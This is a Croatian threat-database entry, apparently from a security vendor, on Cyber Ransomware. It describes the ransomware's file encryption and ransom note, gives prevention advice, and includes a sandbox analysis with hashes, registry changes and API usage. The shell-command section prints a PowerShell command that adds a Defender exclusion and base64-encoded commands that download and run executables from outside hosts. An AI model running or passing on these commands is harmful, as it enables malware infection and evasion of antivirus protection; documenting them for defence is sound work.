Ponuda s popustom na više licenci
Baza prijetnji Ransomware Cyber Ransomware

Cyber Ransomware

Do Mezo. Ransomware. godine
Prevedi na:

Karta prijetnji

Popularity Rank: 10,078
Razina prijetnje: 100 % (Visoko)
Zaražena računala: 3,489
Prvi put viđeno: October 15, 2021
Zadnje viđeno: November 12, 2025
Pogođeni OS: Windows

Maliciozni program pod nazivom Cyber je malware iz vrste ransomwarea. Nakon što se izvrši na oštećenom sustavu, odmah pokreće proces enkripcije za sve datoteke na uređaju i dodaje njihovim izvornim nazivima datoteka ekstenziju '.Cyber'. Na primjer, datoteka s početnim nazivom '1.doc' sada bi se nakon šifriranja pojavila kao '1.doc.Cyber'. Slično, '2.pdf' bi postao '2.pdf.Cyber", i tako dalje. Istraživači kibernetičke sigurnosti ističu da se Cyber Ransomware prijetnja temelji na Chaos zlonamjernom softveru.

Osim enkripcije datoteke, Cyber Ransomware također mijenja pozadinu radne površine i generira bilješku o otkupnini pod nazivom 'read_it.txt'. Obavijest o otkupnini sadrži upute za žrtve, pri čemu kibernetički kriminalci odgovorni za napade ransomwarea obično traže plaćanje u zamjenu za ključ za dešifriranje za otključavanje šifriranih datoteka.

Cyber Ransomware može brojne vrste datoteka učiniti nedostupnima putem enkripcije

Napomena o ransomwareu pokazuje da su važne datoteke žrtve, kao što su baze podataka, dokumenti i fotografije, šifrirane i da se mogu dešifrirati samo plaćanjem otkupnine u kriptovaluti Bitcoin. Iznos otkupnine obično se spominje, a žrtvama se daje mogućnost testiranja dešifriranja na ograničenom broju datoteka prije nego što plate.

Bilješka često sadrži podatke za kontakt napadača ili njihovih predstavnika. Međutim, ponekad podaci za kontakt možda nisu valjani, a žrtva može imati poteškoća u komunikaciji s napadačima. Osim toga, pozadina ransomwarea može prikazivati istu poruku i iznos otkupnine, ali s različitim kontaktnim podacima.

U većini napada ransomwarea dešifriranje bez sudjelovanja napadača obično nije moguće. Čak i kada žrtve plate otkupninu, možda neće dobiti ključeve za dešifriranje ili softver potreban za oporavak svojih datoteka. Kao rezultat toga, stručnjaci strogo savjetuju da se ne plaća otkupnina, čak i ako su podaci za kontakt legitimni i ako se iznos otkupnine čini pristupačnim.

Važno je zapamtiti da plaćanje otkupnine podržava kriminalnu aktivnost i ne jamči oporavak šifriranih podataka. Žrtve bi trebale istražiti druge mogućnosti, poput vraćanja datoteka iz sigurnosnih kopija ili traženja pomoći od stručnjaka za sigurnost.

Zaštitite svoje uređaje i podatke od prijetnji poput Cyber Ransomwarea

Najbolje mjere koje korisnici mogu primijeniti kako bi zaštitili svoje uređaje i podatke od napada ransomwarea uključuju kombinaciju proaktivnih i reaktivnih strategija.

Prvo, korisnici bi trebali biti oprezni u svojim online aktivnostima i poduzeti korake kako bi izbjegli da postanu žrtve uobičajenih vektora zaraze ransomwareom, kao što su phishing e-poruke ili zlonamjerna preuzimanja. To uključuje korištenje jakih i jedinstvenih lozinki, redovito ažuriranje softvera i operativnih sustava te oprez sa sumnjivom e-poštom ili vezama.

Drugo, korisnici bi trebali primijeniti sigurnosne mjere, kao što je korištenje renomiranog anti-malware softvera i omogućavanje vatrozida za blokiranje neovlaštenog pristupa njihovim uređajima. Također bi trebali razmotriti korištenje alata za otkrivanje i odgovor krajnje točke (EDR), koji mogu pomoći u otkrivanju i odgovoru na napade ransomwarea u stvarnom vremenu.

Treće, korisnici bi trebali redovito sigurnosno kopirati svoje važne podatke na vanjski izvor, kao što je usluga u oblaku ili vanjski tvrdi disk. To može osigurati da čak i ako je njihov uređaj zaražen ransomwareom, i dalje mogu pristupiti svojim podacima bez plaćanja otkupnine.

Četvrto, u slučaju napada ransomwarea, korisnici bi trebali izbjegavati plaćanje otkupnine jer to možda ne jamči siguran oporavak njihovih podataka i može potaknuti daljnje kriminalne aktivnosti. Umjesto toga, trebali bi potražiti profesionalnu pomoć stručnjaka za sigurnost i razmisliti o prijavi napada policiji.

Konačno, korisnici bi trebali biti informirani o najnovijim prijetnjama ransomwarea i tehnikama napada koje se razvijaju kako bi ostali svjesni i spremni zaštititi se od mogućih napada.

Cijeli tekst poruke o otkupnini koju je izbacio Cyber Ransomware je:

Ne brinite, možete vratiti sve svoje datoteke!

Sve vaše datoteke kao što su dokumenti, fotografije, baze podataka i drugi važni su šifrirani

Kakva jamstva vam dajemo?

Možete poslati 3 svoje šifrirane datoteke, a mi ćemo ih dešifrirati besplatno.

Morate slijediti ove korake za dešifriranje datoteka:

1) Pišite nam na e-mail :test@test.com ( U slučaju da nema odgovora u roku od 24 sata provjerite spam folder

ili nam pišite na ovaj e-mail: test2@test.com)

2) Nabavite Bitcoin (Morate platiti dešifriranje u Bitcoinima.

Nakon uplate poslat ćemo vam alat koji će dekriptirati sve vaše datoteke.)

Cyber Ransomware video

Savjet: Pretvorite svoj zvuk i gledati video u full screen modu.

Izvješće o analizi

Opće informacije

Family Name: Cyber Ransomware
Signature status: No Signature

Known Samples

MD5: 6ae50bdc7246401c666cd7e1b200d87a
SHA1: ec759c5df1845d1109fe2518380233ae1854850f
Veličina datoteke: 1.84 MB, 1839616 bytes
MD5: 92a4a3aa4b40e95e8ca1d015c048246b
SHA1: 443a688cc83423c7511d56b626f85a392e798ac1
Veličina datoteke: 5.12 KB, 5120 bytes
MD5: 969c9e50187024581e8943a2d8ed9d2d
SHA1: 57cec27d4e6c7714265cad52f7fd9cf58f68bb82
SHA256: C78A44442518C4EC39EF4E85C331C5CDD25C92FC92A80010C6F6DC3F59B1C42D
Veličina datoteke: 4.61 KB, 4608 bytes
MD5: d1657a06fd2a757c43372f77ed433f30
SHA1: 48d0f17e206fdcff74121783989c90117ee411f4
SHA256: 0AFC88FC7DD731CF7D5884C415D5A27DC4FB39EB54DC890257AFEA947FC05725
Veličina datoteke: 4.54 MB, 4536320 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File is 32-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
Show More
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

File Traits

  • HighEntropy
  • No Version Info
  • x86

Block Information

Total Blocks: 8
Potentially Malicious Blocks: 7
Whitelisted Blocks: 1
Unknown Blocks: 0

Visual Map

x x x x x x x 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • ClipBanker.VA
  • ClipBanker.VB

Files Modified

File Attributes
\device\namedpipe\pshost.133968239486036860.2548.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.133973844142271624.5256.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134074942406200962.1348.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\cheat.dll Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.exe Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.ini Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_0zdqbhap.r32.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_24snuqhq.oyp.ps1 Generic Write,Read Attributes
Show More
c:\users\user\appdata\local\temp\__psscriptpolicytest_al3g5ul4.lob.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_aocz5vmr.rla.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_dv4pkhv1.qlu.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_iqv5olmb.tfb.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ruwcjycv.ppp.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ux1vmtfo.12w.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\album_td_3-8-0_activation.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\tmp4351$.tmp Generic Write,Read Attributes,Delete
c:\users\user\appdata\local\temp\ttrj.exe Generic Write,Read Attributes
c:\users\user\deployment_test.exe Generic Write,Read Attributes

Registry Modifications

Key::Value Podaci API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 넜泝Ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
Show More
HKLM\software\microsoft\windows\currentversion\runonce::wextract_cleanup0 rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Vebexpvr\AppData\Local\Temp\IXP000.TMP\" RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ᭖洢Ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 洧Ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::0 C:\Users\Vebexpvr\AppData\Local\Launcher.exeC:\Users\Vebexpvr\AppData\Local RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::1 Z1敖敢灸牶B 뻯.Vebexpvr RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::0 V1嫬齤灡摰瑡a@ 뻯啮坤嫬齤.穗붽æappdata RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::0 P1嫬齤潬慣l< 뻯嫬齤嫬齥.穘ˑQlocal RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::nodeslot „ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bags\132\shell::sniffedfoldertype Generic RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 椓嵌Ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ﻒ⍮味ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 㴠ȁ龡^8獖} RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey

Windows API Usage

Category API
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Shell Execute
  • CreateProcess
  • ShellExecute
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreatePortSection
Show More
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteValueKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFindAtom
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetNlsSectionPtr
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile

206 additional items are not displayed above.

Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Encryption Used
  • BCryptOpenAlgorithmProvider
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

open C:\Users\Vebexpvr\AppData\Local\Launcher.exe
open C:\Users\Vebexpvr\deployment_test.EXE
cmd.exe /c father.bat
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -WindowStyle Hidden -FilePath powershell -Verb RunAs -ArgumentList '-NoProfile -Command Add-MpPreference -ExclusionPath \"C:\Users\Vebexpvr\*\"
open powershell -EncodedCommand "PAAjAHYAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQAtAHAAbAB1AGcAaQBuAC4AaQBuAGYAbwAvAHkAYwAuAGUAeABlACcALAAgADwAIwBqAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZABzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAdAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwAuAGUAeABlACcAKQApADwAIwBlAGEAdgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAGQAbwBiAGUALQBwAGwAdQBnAGkAbgAuAGkAbgBmAG8ALwB5AGMAdgAuAGUAeABlACcALAAgADwAIwBqAHEAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAcQB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAdABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwB2AC4AZQB4AGUAJwApACkAPAAjAGkAZgBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAG0AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMALgBlAHgAZQAnACkAPAAjAHYAcQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAdABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMAdgAuAGUAeABlACcAKQA8ACMAegB2AHQAIwA+AA=="
Show More
open powershell -EncodedCommand "PAAjAHQAegBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwB3AGkAbgA4ADYALgBlAHgAZQAnACwAIAA8ACMAegBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHMAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB3AGkAbgA4ADYALgBlAHgAZQAnACkAKQA8ACMAaAB6AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAcgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuADgANgAuAGUAeABlACcAKQA8ACMAbgB2AG0AIwA+AA=="
open powershell -EncodedCommand "PAAjAGsAYwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAcwBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAZABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdABlACMAPgA="
open C:\Users\Qoceadrm\AppData\Local\Temp\Album_TD_3-8-0_Activation.exe
open C:\Users\Qoceadrm\AppData\Local\Temp\ttrj.exe

Povezane objave

U trendu

Nagledanije

Učitavam...